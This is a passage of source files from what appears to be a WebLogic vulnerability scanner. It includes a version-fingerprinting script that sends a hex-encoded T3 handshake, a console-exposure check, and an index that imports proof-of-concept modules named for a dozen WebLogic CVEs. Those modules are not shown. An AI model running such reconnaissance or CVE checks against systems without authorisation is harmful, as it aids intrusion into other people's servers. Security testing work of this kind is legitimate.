(1,"[+] [{}] Weblogic console address is exposed! The path is: {}".format(url+':'+str(port),u)) 25 | else: 26 | return (0,"[-] [{}] Weblogic console address not found!".format(url+':'+str(port))) 27 | 28 | if __name__=="__main__": 29 | url = sys.argv[1] 30 | port = int(sys.argv[2]) 31 | run(url,port) 32 | -------------------------------------------------------------------------------- /poc/Whoareu.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import re 11 | import socket 12 | from time import sleep 13 | 14 | def whoareu(rip,rport): 15 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | server_address = (rip, rport) 17 | sock.connect(server_address) 18 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 19 | sleep(1) 20 | try: 21 | v=(re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 22 | if v: 23 | return (1,"[+] [{}] Weblogic Version Is {}".format(rip+':'+str(rport),v)) 24 | else: 25 | return (0,"[-] [{}] Weblogic Version Recognition Failed".format(rip+':'+str(rport))) 26 | except: 27 | return (0, "[-] [{}] Weblogic Version Recognition Failed".format(rip + ':' + str(rport))) 28 | 29 | def run(rip,rport): 30 | return whoareu(rip,rport) -------------------------------------------------------------------------------- /poc/index.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | from poc import Console 11 | from poc import CVE_2014_4210 12 | from poc import CVE_2016_0638 13 | from poc import CVE_2016_3510 14 | from poc import CVE_2017_10271 15 | from poc import CVE_2017_3248 16 | from poc import CVE_2017_3506 17 | from poc import CVE_2018_2628 18 | from poc import CVE_2018_2893 19 | from poc import CVE_2018_2894 20 | from poc import CVE_2019_2725 21 | from poc import CVE_2019_2729 22 | from poc import CVE_2019_2890 23 | from poc import Whoareu 24 | 25 | pocindex=['Whoareu','Console', 'CVE_2014_4210', 'CVE_2016_0638', 'CVE_2016_3510', 'CVE_2017_10271', 'CVE_2017_3248', 'CVE_2017_3506', 'CVE_2018_2628', 'CVE_2018_2893', 'CVE_2018_2894', 'CVE_2019_2725', 'CVE_2019_2729', 'CVE_2019_2890'] 26 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | fake_useragent==0.1.11 2 | requests==2.23.0 3 | -------------------------------------------------------------------------------- /target.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1:7001 2 | 172.19.19.19 --------------------------------------------------------------------------------